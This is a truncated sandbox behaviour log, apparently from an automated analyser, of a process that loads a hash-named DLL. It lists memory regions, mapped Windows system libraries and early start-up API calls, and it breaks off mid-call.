# Flog Txt Version 1 # Analyzer Version: 4.3.0 # Analyzer Build Date: Sep 20 2021 05:59:55 # Log Creation Date: 28.09.2021 06:38:38.911 Process: id = "1" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x45cc3000" os_pid = "0xcc8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x664" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fel=\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\tmpuglwtn31\" /s" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 118 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 119 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 120 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 121 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 122 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 123 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 124 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 125 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 126 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 127 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 128 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 269 start_va = 0x550000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 270 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 271 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 272 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 273 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 274 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 275 start_va = 0x7ffc5a2e0000 end_va = 0x7ffc5a358fff monitored = 0 entry_point = 0x7ffc5a2ffb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 276 start_va = 0x7ff5ffe50000 end_va = 0x7ff5ffecdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\apppatch64\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\apppatch64\\sysmain.sdb") Region: id = 277 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 278 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 279 start_va = 0x650000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 280 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 281 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 282 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 283 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 284 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 285 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 286 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 287 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 288 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 289 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 290 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 291 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 292 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 293 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 294 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 295 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 296 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 297 start_va = 0x750000 end_va = 0x8d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 298 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 299 start_va = 0x8e0000 end_va = 0xa60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 300 start_va = 0xa70000 end_va = 0x1e6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 301 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 302 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 303 start_va = 0x1e70000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 304 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 305 start_va = 0x1e70000 end_va = 0x1f2ffff monitored = 0 entry_point = 0x1e90da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 306 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 307 start_va = 0x1e70000 end_va = 0x1f4cfff monitored = 0 entry_point = 0x1ece0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 308 start_va = 0x7ffc5a7b0000 end_va = 0x7ffc5a845fff monitored = 0 entry_point = 0x7ffc5a7d5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 309 start_va = 0x1fa0000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 310 start_va = 0x20f0000 end_va = 0x2426fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 311 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 312 start_va = 0x1e70000 end_va = 0x1f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 313 start_va = 0x7ffc5a3a0000 end_va = 0x7ffc5a525fff monitored = 0 entry_point = 0x7ffc5a3ed700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 314 start_va = 0x7ffc5e1e0000 end_va = 0x7ffc5e2a0fff monitored = 0 entry_point = 0x7ffc5e200da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 315 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 316 start_va = 0x7ffc5f760000 end_va = 0x7ffc5f806fff monitored = 0 entry_point = 0x7ffc5f76b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 317 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 318 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 319 start_va = 0x4c0000 end_va = 0x504fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 320 start_va = 0x1f0000 end_va = 0x1f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 321 start_va = 0x1fa0000 end_va = 0x202dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 322 start_va = 0x20e0000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 323 start_va = 0x510000 end_va = 0x511fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 324 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 325 start_va = 0x2430000 end_va = 0x282afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002430000" filename = "" Region: id = 326 start_va = 0x530000 end_va = 0x533fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 327 start_va = 0x1f70000 end_va = 0x1f82fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 328 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 329 start_va = 0x2830000 end_va = 0x292ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002830000" filename = "" Region: id = 330 start_va = 0x2930000 end_va = 0x2a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002930000" filename = "" Region: id = 331 start_va = 0x2a30000 end_va = 0x2b0cfff monitored = 0 entry_point = 0x2a8e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 332 start_va = 0x2a30000 end_va = 0x2b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a30000" filename = "" Region: id = 333 start_va = 0x2b30000 end_va = 0x2c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 334 start_va = 0x2c30000 end_va = 0x2d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c30000" filename = "" Region: id = 335 start_va = 0x7ffc4e6d0000 end_va = 0x7ffc4e887fff monitored = 0 entry_point = 0x7ffc4e73e630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 336 start_va = 0x7ffc55c60000 end_va = 0x7ffc55fe1fff monitored = 0 entry_point = 0x7ffc55cb1220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 337 start_va = 0x7ffc5bab0000 end_va = 0x7ffc5badcfff monitored = 0 entry_point = 0x7ffc5bac9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 338 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 350 start_va = 0x7ffc4c130000 end_va = 0x7ffc4c13ffff monitored = 0 entry_point = 0x7ffc4c133d50 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\System32\\pcacli.dll" (normalized: "c:\\windows\\system32\\pcacli.dll") Region: id = 351 start_va = 0x7ffc541d0000 end_va = 0x7ffc541eafff monitored = 0 entry_point = 0x7ffc541d1040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 394 start_va = 0x2d30000 end_va = 0x2e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d30000" filename = "" Region: id = 395 start_va = 0x1e70000 end_va = 0x1e73fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 449 start_va = 0x2e30000 end_va = 0x2f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e30000" filename = "" Region: id = 563 start_va = 0x3030000 end_va = 0x312ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 648 start_va = 0x3130000 end_va = 0x322ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003130000" filename = "" Region: id = 695 start_va = 0x3230000 end_va = 0x332ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003230000" filename = "" Region: id = 925 start_va = 0x3330000 end_va = 0x342ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003330000" filename = "" Region: id = 1236 start_va = 0x3430000 end_va = 0x352ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 1309 start_va = 0x3530000 end_va = 0x362ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003530000" filename = "" Region: id = 1384 start_va = 0x3630000 end_va = 0x372ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 1454 start_va = 0x3730000 end_va = 0x382ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 2086 start_va = 0x3830000 end_va = 0x392ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003830000" filename = "" Region: id = 2193 start_va = 0x3930000 end_va = 0x3a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003930000" filename = "" Region: id = 3805 start_va = 0x3a30000 end_va = 0x3b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a30000" filename = "" Region: id = 4138 start_va = 0x3b30000 end_va = 0x3c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b30000" filename = "" Region: id = 4395 start_va = 0x3c30000 end_va = 0x3d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c30000" filename = "" Region: id = 4757 start_va = 0x3d30000 end_va = 0x3e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d30000" filename = "" Region: id = 5979 start_va = 0x3e30000 end_va = 0x3f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e30000" filename = "" Region: id = 6191 start_va = 0x3f30000 end_va = 0x402ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f30000" filename = "" Region: id = 6270 start_va = 0x4030000 end_va = 0x412ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004030000" filename = "" Region: id = 6519 start_va = 0x4130000 end_va = 0x422ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 7734 start_va = 0x4230000 end_va = 0x432ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004230000" filename = "" Region: id = 8977 start_va = 0x4330000 end_va = 0x442ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004330000" filename = "" Region: id = 11455 start_va = 0x4430000 end_va = 0x452ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 12044 start_va = 0x4530000 end_va = 0x462ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 13643 start_va = 0x4630000 end_va = 0x472ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004630000" filename = "" Region: id = 14891 start_va = 0x4730000 end_va = 0x482ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004730000" filename = "" Region: id = 16411 start_va = 0x4830000 end_va = 0x492ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004830000" filename = "" Region: id = 16990 start_va = 0x4930000 end_va = 0x4a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004930000" filename = "" Thread: id = 1 os_tid = 0x390 [0069.143] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0069.143] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0069.143] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0069.143] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0069.143] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0069.144] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0069.145] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0069.145] GetProcessHeap () returned 0x550000 [0069.145] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0069.149] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0069.149] GetLastError () returned 0x7e [0069.149] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0069.149] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0069.149] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3c8) returned 0x5603f0 [0069.149] SetLastError (dwErrCode=0x7e) [0069.149] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1200) returned 0x567790 [0069.150] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0069.151] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0069.151] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0069.151] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0069.151] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fel=\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\tmpuglwtn31\" /s" [0069.151] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fel=\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\tmpuglwtn31\" /s" [0069.151] GetACP () returned 0x4e4 [0069.151] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x228) returned 0x55b540 [0069.151] IsValidCodePage (CodePage=0x4e4) returned 1 [0069.151] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0069.151] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0069.151] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0069.151] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0069.151] GetStringTypeW (in: 